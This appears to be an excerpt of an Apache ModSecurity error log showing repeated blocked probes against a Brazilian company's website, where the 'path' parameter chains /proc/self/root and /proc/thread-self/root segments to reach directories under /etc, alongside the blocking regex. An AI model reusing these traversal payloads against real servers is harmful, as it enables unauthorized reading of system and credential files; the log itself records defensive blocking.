"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaZ9Y0UrI5A3LftIyWhAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:24.471890 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:60040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaaAkwaGbbGflqUZACnAAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:28:24.591193 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:51032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaaCmAPhZkrhU8w4lfhAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:26.971440 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:51036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaaimAPhZkrhU8w4lfhwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:28.281140 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:51042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqabOw_le52K8_3pV3RpQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:30.734346 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:50920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqabuw_le52K8_3pV3RqgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:33.431966 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:50922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqacew_le52K8_3pV3RuAAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:34.722971 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:50938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqackzinOy1jxa1j4cG-AAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:41.002623 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:50940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaeSmAPhZkrhU8w4lfkwAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:43.482697 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:43130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqae_u8EFLIOrSqIpv3YwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:59.755691 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:43140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqai_u8EFLIOrSqIpv3ewAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:01.156630 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:39506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqajSmAPhZkrhU8w4lfqQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:25.302518 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:43940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqapew_le52K8_3pV3R_QAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:29:29.723703 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:39514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaqQkwaGbbGflqUZAC1wAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:33.356095 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:47956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqardY0UrI5A3LftIyWrAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:35.672742 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:47958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqar9Y0UrI5A3LftIyWrwAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:36.974841 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:47970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqasOoXxyEfFpUF8f9gxAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:29:43.627453 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:47976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqat-yqAr6etmhZHNqx8gAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:30:08.018949 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:38838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa0EzinOy1jxa1j4cHKQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:30:13.938882 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:45338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa1da6ubjKNq_cu4aL1wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:30:16.782186 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:42462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa2Ow_le52K8_3pV3SUwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:30:18.088437 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:55534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa2uoXxyEfFpUF8f9g1AAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
